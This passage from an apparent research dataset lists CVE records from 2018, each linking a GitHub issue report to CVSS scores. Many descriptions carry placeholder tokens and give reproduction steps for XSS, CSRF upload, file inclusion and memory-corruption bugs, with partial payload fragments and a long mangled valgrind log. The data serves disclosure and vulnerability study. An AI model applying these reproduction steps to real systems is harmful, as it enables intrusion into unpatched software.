  89123. "description": "Stack based buffer overflow in APITAG There exists a stack based buffer overflow in APITAG function at APITAG , invoked by APITAG in APITAG . The issue gets triggered when the value of depth in APITAG is set greater than NUMBERTAG being passed to i in APITAG . The APITAG function sets the ith bit to NUMBERTAG in case where the i value exceeds more than NUMBERTAG the computation goes wrong & a stack overflow is triggered. Tested version NUMBERTAG APITAG Command tcpflow a D b m o Fk \u2013r $POC Debugging: APITAG CODETAG Backtrace: ERRORTAG ASAN Report ERRORTAG Note: Issue reproducible when compiled with APITAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  89124. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89125. "severity": "MEDIUM",
  89126. "baseScore": 5.5,
  89127. "impactScore": 3.6,
  89128. "exploitabilityScore": 1.8
  89129. },
  89130. {
  89131. "CVE_ID": "CVE-2018-18540",
  89132. "Issue_Url_old": "https://github.com/Teakki/issue/issues/24",
  89133. "Issue_Url_new": "https://github.com/teakki/issue/issues/24",
  89134. "Repo_new": "teakki/issue",
  89135. "Issue_Created_At": "2018-10-20T11:25:33Z",
  89136. "description": "There is a xss. when add a new document, insert a picture, it can set the picture's url, so set it with ==> ERRORTAG ,after finished that, it will be pop a window. APITAG",
  89137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89138. "severity": "MEDIUM",
  89139. "baseScore": 6.1,
  89140. "impactScore": 2.7,
  89141. "exploitabilityScore": 2.8
  89142. },
  89143. {
  89144. "CVE_ID": "CVE-2018-18541",
  89145. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/1536",
  89146. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/1536",
  89147. "Repo_new": "teeworlds/teeworlds",
  89148. "Issue_Created_At": "2018-10-20T19:20:56Z",
  89149. "description": "CVE: Remote denial of service fixed in NUMBERTAG Hi, apparently version NUMBERTAG and version NUMBERTAG fix a remote denial of service vulnerability in Teeworlds. Did you request a CVE for this security issue? It appears that all versions prior NUMBERTAG are affected. Is this correct? Are these the fixing commits? URLTAG URLTAG",
  89150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89151. "severity": "HIGH",
  89152. "baseScore": 7.5,
  89153. "impactScore": 3.6,
  89154. "exploitabilityScore": 3.9
  89155. },
  89156. {
  89157. "CVE_ID": "CVE-2018-18578",
  89158. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/5",
  89159. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/5",
  89160. "Repo_new": "ky-j/dedecms",
  89161. "Issue_Created_At": "2018-10-22T06:23:15Z",
  89162. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG docx. FILETAG APITAG Phink club",
  89163. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89164. "severity": "MEDIUM",
  89165. "baseScore": 6.1,
  89166. "impactScore": 2.7,
  89167. "exploitabilityScore": 2.8
  89168. },
  89169. {
  89170. "CVE_ID": "CVE-2018-18834",
  89171. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/81",
  89172. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/81",
  89173. "Repo_new": "mz-automation/libiec61850",
  89174. "Issue_Created_At": "2018-10-29T15:52:16Z",
  89175. "description": "Heap buffer overflow in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . In the directory APITAG , the following specific APITAG sequence will cause heap buffer overflow in function APITAG in APITAG : CODETAG However, if the APITAG is constructed like following two way, this error will not be triggered. APITAG or CODETAG In detail, the complete version of APITAG that triggers heap buffer overflow is FILETAG . In order to verify this problem, just replace it with initial APITAG in APITAG , compile it and run it by command APITAG . This is the ASAN information: ERRORTAG",
  89176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89177. "severity": "CRITICAL",
  89178. "baseScore": 9.8,
  89179. "impactScore": 5.9,
  89180. "exploitabilityScore": 3.9
  89181. },
  89182. {
  89183. "CVE_ID": "CVE-2018-18927",
  89184. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/22",
  89185. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/22",
  89186. "Repo_new": "sanluan/publiccms",
  89187. "Issue_Created_At": "2018-11-01T13:26:09Z",
  89188. "description": "There is a stored xss via PATHTAG in logo. Hello,my nickname is isecream,I found a stored xss in the logo First, access the page FILETAG the logo is obtained from database. FILETAG Then\uff0ci write the xss payload to the database via PATHTAG FILETAG you can see,the value has been changed FILETAG And then,access the last page FILETAG so,there is a stored xss in the all logo",
  89189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89190. "severity": "MEDIUM",
  89191. "baseScore": 4.8,
  89192. "impactScore": 2.7,
  89193. "exploitabilityScore": 1.7
  89194. },
  89195. {
  89196. "CVE_ID": "CVE-2018-19135",
  89197. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/494",
  89198. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/494",
  89199. "Repo_new": "clippercms/clippercms",
  89200. "Issue_Created_At": "2018-11-10T18:21:01Z",
  89201. "description": "APITAG NUMBERTAG File Upload CSRF Vulnerability. Hi, This is regarding the APITAG NUMBERTAG File Upload CSRF Vulnerability that I already reported by sending a direct email last August NUMBERTAG regarding this issue and followed up on September NUMBERTAG and September NUMBERTAG but haven't received any reply. APITAG NUMBERTAG does not have CSRF protection on its kcfinder file upload which is being used by default. This can be used by an attacker to perform actions for an admin (or any user with file upload capability). With this vulnerability, it can automatically upload file/s _(by default it allows APITAG as file types)_. Note that web shell that can be used for remote code execution can be achieved depending on the file types being accepted. Uploaded file can be accessed publicly on the \" /assets/files \" directory (e.g. uploaded a malicious html file with filename: FILETAG file => URLTAG This can lead for the website to be host unintended file/s. Steps to reproduce: Admin (or user with file upload capability) logged in APITAG NUMBERTAG browse/open a controlled website with the poc below (e.g. by link or open APITAG below in a browser where admin/user logged in to APITAG NUMBERTAG file is uploaded and can be accessed on URLTAG (where FILETAG is the filename of the uploaded file) Proof of Concept: APITAG below will automatically upload a \" FILETAG \" file with simple XSS payload. Steps above are how to make use of the APITAG ERRORTAG Actual video demo of the APITAG NUMBERTAG file upload CSRF vulnerability being exploited: ![IMAGE ALT TEXT HERE URLTAG",
  89202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89203. "severity": "HIGH",
  89204. "baseScore": 8.8,
  89205. "impactScore": 5.9,
  89206. "exploitabilityScore": 2.8
  89207. },
  89208. {
  89209. "CVE_ID": "CVE-2018-19139",
  89210. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/188",
  89211. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/188",
  89212. "Repo_new": "jasper-software/jasper",
  89213. "Issue_Created_At": "2018-11-09T08:25:24Z",
  89214. "description": "memory leak detected. Hello jasper team, I have identified an issue affecting jasper by using AFL fuzz. PATHTAG valgrind v tool=memcheck leak check=full jasper input APITAG output FILETAG output format bmp NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: jasper input APITAG output FILETAG output format bmp NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG jasper NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d1c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d4c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d3d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cfc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d2d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG cff8d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG c NUMBERTAG c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG cecc NUMBERTAG APITAG redirected to NUMBERTAG a NUMBERTAG strcpy NUMBERTAG REDIR NUMBERTAG cdb0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG c NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG free NUMBERTAG REDIR NUMBERTAG cffe NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG ccd0 (strchrnul NUMBERTAG REDIR NUMBERTAG cffdf0 APITAG redirected to NUMBERTAG cde0 (mempcpy) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes NUMBERTAG REDIR NUMBERTAG d NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG BDAF3B: raise APITAG NUMBERTAG by NUMBERTAG BDC2F0: abort APITAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG Searching for pointers to NUMBERTAG not freed blocks NUMBERTAG Checked NUMBERTAG bytes NUMBERTAG bytes in NUMBERTAG blocks are definitely lost in loss record NUMBERTAG of NUMBERTAG at NUMBERTAG BF: malloc APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG jas_malloc APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG jpc_unk_getparms APITAG NUMBERTAG by NUMBERTAG FA9FA: jpc_getms APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Reachable blocks (those to which a pointer was found) are not shown NUMBERTAG To see them, rerun with: leak check=full show leak kinds=all NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted PATHTAG jasper input APITAG output FILETAG output format bmp warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) Aborted Attached the POC FILETAG Version jasper NUMBERTAG Found by:TAN JIE",
  89215. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89216. "severity": "MEDIUM",
  89217. "baseScore": 5.5,
  89218. "impactScore": 3.6,
  89219. "exploitabilityScore": 1.8
  89220. },
  89221. {
  89222. "CVE_ID": "CVE-2018-19246",
  89223. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/134",
  89224. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/134",
  89225. "Repo_new": "athlon1600/php-proxy-app",
  89226. "Issue_Created_At": "2018-11-13T04:06:52Z",
  89227. "description": "PHP Proxy NUMBERTAG Local File Inclusion (LFI) Vulnerability (on default pre installed version). Brief description of this vulnerability: Downloadable pre installed version of PHP Proxy NUMBERTAG current as of this posting day) from www.php proxy.com ( FILETAG make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. (example: _ URLTAG Affected Version NUMBERTAG pre installed version) Reason of this vulnerability: The downloadable pre installed version of PHP Proxy NUMBERTAG current pre installed version as of this posting day) from www.php proxy.com ( FILETAG already contains the default app_key in FILETAG file which might be used by several users using the application thus is vulnerable to local file inclusion. APITAG Encrypted URL value lies on the app_key as seen on a snippet of code below. ERRORTAG Wherein which the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address. CODETAG Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload. Proof of Concept: Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP Proxy NUMBERTAG application URL: example: _ URLTAG (replace APITAG with the generated encrypted string value) ERRORTAG Below screenshot is an example of gaining an encrypted URL string within which used to read the PATHTAG of the server. FILETAG Impact: Gain access to arbitrary local files in the server. Suggested Mitigation: There is already a FILETAG included on the downloadable pre installed version of PHP Proxy which will generate and overwrite the default app_key, however users most probably don't use it and kept on using the default app_key. Possible mitigation is make the app_key value in the FILETAG blank and make users just make use of the FILETAG to generate and overwrite the default app_key.",
  89228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89229. "severity": "HIGH",
  89230. "baseScore": 7.5,
  89231. "impactScore": 3.6,
  89232. "exploitabilityScore": 3.9
  89233. },
  89234. {
  89235. "CVE_ID": "CVE-2018-19416",
  89236. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/196",
  89237. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/196",
  89238. "Repo_new": "sysstat/sysstat",
  89239. "Issue_Created_At": "2018-11-21T03:26:28Z",
  89240. "description": "bug report]: out of bound read in sadf which may lead to code execution. Information: version: APITAG related APITAG ERRORTAG Description: APITAG doesn't check the args and sadf crashes when the args is invalid. The following is my debug info ERRORTAG If we control src and n of memmove , stack overflow may happen which lead to ROP even code execution! ASAN ERRORTAG [poc here URLTAG",
  89241. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89242. "severity": "HIGH",
  89243. "baseScore": 7.8,
  89244. "impactScore": 5.9,
  89245. "exploitabilityScore": 1.8
  89246. },
  89247. {
  89248. "CVE_ID": "CVE-2018-19423",
  89249. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1098",
  89250. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1098",
  89251. "Repo_new": "codiad/codiad",
  89252. "Issue_Created_At": "2018-11-11T16:26:19Z",
  89253. "description": "APITAG Execution of upload files.. Hello, I have a question about management of uploaded file in your application. Is it intended behavior that uploaded files are executable? I checked that Codiad has not the mitigations for execution of uploaded file. Even though uploading feature needs administrator credential, execution of uploaded file is still dangerous. I think it needs to the mitigations like compressing/encoding upload file or hide the upload path.",
  89254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  89255. "severity": "HIGH",
  89256. "baseScore": 7.2,
  89257. "impactScore": 5.9,
  89258. "exploitabilityScore": 1.2
  89259. },
  89260. {
  89261. "CVE_ID": "CVE-2018-19424",
  89262. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/495",
  89263. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/495",
  89264. "Repo_new": "clippercms/clippercms",
  89265. "Issue_Created_At": "2018-11-14T08:19:01Z",
  89266. "description": "APITAG NUMBERTAG allows to upload htaccess file in default setting.. Brief of this vulnerability APITAG allows to upload .htaccess. It is able to execute the any types of the extensions as PHP scripts. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Reason of This Vulnerability .htaccess is allowed to upload in your default whitelist. It should be removed in default whitelist. It can change the access configuration about current directory and subdirectories. Even this file can drive to execute any extensions as PHP script. This vulnerability needs admin credentials, but it can be used to get system shell to adversary who get the admin authority using other attack( e.g. XSS ).",
  89267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  89268. "severity": "HIGH",
  89269. "baseScore": 7.2,
  89270. "impactScore": 5.9,
  89271. "exploitabilityScore": 1.2
  89272. },
  89273. {
  89274. "CVE_ID": "CVE-2018-19654",
  89275. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/1",
  89276. "Issue_Url_new": "https://github.com/venan24/scms/issues/1",
  89277. "Repo_new": "venan24/scms",
  89278. "Issue_Created_At": "2018-11-28T07:26:36Z",
  89279. "description": "smcs NUMBERTAG arbitrarily account register . smcs NUMBERTAG arbitrarily account register via FILETAG firstly,register an account test|test FILETAG then,let's see the issue code ERRORTAG we can see the parameter was validated by the function of APITAG we can not use some special characters.but when database meets %c2,it will be identified as a invalid character and also fit the ruler of the function APITAG thus.We can register another test finally,register other account test%c NUMBERTAG FILETAG",
  89280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  89281. "severity": "HIGH",
  89282. "baseScore": 7.5,
  89283. "impactScore": 3.6,
  89284. "exploitabilityScore": 3.9
  89285. },
  89286. {
  89287. "CVE_ID": "CVE-2018-19666",
  89288. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1585",
  89289. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1585",
  89290. "Repo_new": "ossec/ossec-hids",
  89291. "Issue_Created_At": "2018-11-28T06:22:52Z",
  89292. "description": "Windows Agent Priv Esc to nt authority\\system. There's a directory traversal issue on the local windows OSSEC agent that allows a low privilege user to become nt authority\\system if they have access to the OSSEC server. Requirements to exploit NUMBERTAG Full access to the OSSEC server NUMBERTAG Low privileged access to a windows system that has the ossec hids agent installed.",
  89293. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  89294. "severity": "HIGH",
  89295. "baseScore": 7.8,
  89296. "impactScore": 5.9,
  89297. "exploitabilityScore": 1.8
  89298. },
  89299. {
  89300. "CVE_ID": "CVE-2018-19751",
  89301. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/83",
  89302. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/83",
  89303. "Repo_new": "domainmod/domainmod",
  89304. "Issue_Created_At": "2018-11-23T10:28:40Z",
  89305. "description": "Stored XSS vulnerability in Custom SSL Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG Goto vulnerable endpoint NUMBERTAG At the place of Display Name, Description, notes put xss payload \"> APITAG POC FILETAG",
  89306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89307. "severity": "MEDIUM",
  89308. "baseScore": 4.8,
  89309. "impactScore": 2.7,
  89310. "exploitabilityScore": 1.7
  89311. },
  89312. {
  89313. "CVE_ID": "CVE-2018-19785",
  89314. "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/140",
  89315. "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/140",
  89316. "Repo_new": "athlon1600/php-proxy-app",
  89317. "Issue_Created_At": "2018-11-30T07:29:06Z",
  89318. "description": "PHP Proxy ver NUMBERTAG have Cross Site Scripting (XSS) Vulnerability. PHP Proxy before NUMBERTAG has Cross Site Scripting (XSS) via the URL field in APITAG . Ref. FILETAG FILETAG",
  89319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89320. "severity": "MEDIUM",
  89321. "baseScore": 6.1,
  89322. "impactScore": 2.7,
  89323. "exploitabilityScore": 2.8
  89324. },
  89325. {
  89326. "CVE_ID": "CVE-2018-19837",
  89327. "Issue_Url_old": "https://github.com/sass/libsass/issues/2659",
  89328. "Issue_Url_new": "https://github.com/sass/libsass/issues/2659",
  89329. "Repo_new": "sass/libsass",
  89330. "Issue_Created_At": "2018-06-02T07:24:05Z",
  89331. "description": "APITAG stack overflow in APITAG APITAG We found with our fuzzer some stack over flow errors in APITAG APITAG APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
  89332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89333. "severity": "MEDIUM",
  89334. "baseScore": 6.5,
  89335. "impactScore": 3.6,
  89336. "exploitabilityScore": 2.8
  89337. },
  89338. {
  89339. "CVE_ID": "CVE-2018-19840",
  89340. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/53",
  89341. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/53",
  89342. "Repo_new": "dbry/wavpack",
  89343. "Issue_Created_At": "2018-11-26T15:27:04Z",
  89344. "description": "Infinite loop when block_samples NUMBERTAG using wavpack. As to NUMBERTAG wavpack might trigger an infinite loop at APITAG due to mis calculation of APITAG . wavpack blocksize NUMBERTAG h $FILE o /tmp/test.wv y example input wav files: FILETAG",
  89345. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89346. "severity": "MEDIUM",
  89347. "baseScore": 5.5,
  89348. "impactScore": 3.6,
  89349. "exploitabilityScore": 1.8
  89350. },
  89351. {
  89352. "CVE_ID": "CVE-2018-19849",
  89353. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/8",
  89354. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/8",
  89355. "Repo_new": "yzmcms/yzmcms",
  89356. "Issue_Created_At": "2018-11-08T15:47:22Z",
  89357. "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: Cross site scripting (XSS) vulnerability in search pages and you can inject arbitrary web script or HTML via the multiple parameters. In the FILETAG row NUMBERTAG No filtering of the searinfo parameter FILETAG Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG {xsspayload}&dosubmit NUMBERTAG eg: xsspayload=\"> APITAG alert NUMBERTAG APITAG FILETAG FILETAG Fix: Filter the searinfo parameter",
  89358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89359. "severity": "MEDIUM",
  89360. "baseScore": 4.8,
  89361. "impactScore": 2.7,
  89362. "exploitabilityScore": 1.7
  89363. },
  89364. {
  89365. "CVE_ID": "CVE-2018-20060",
  89366. "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1316",
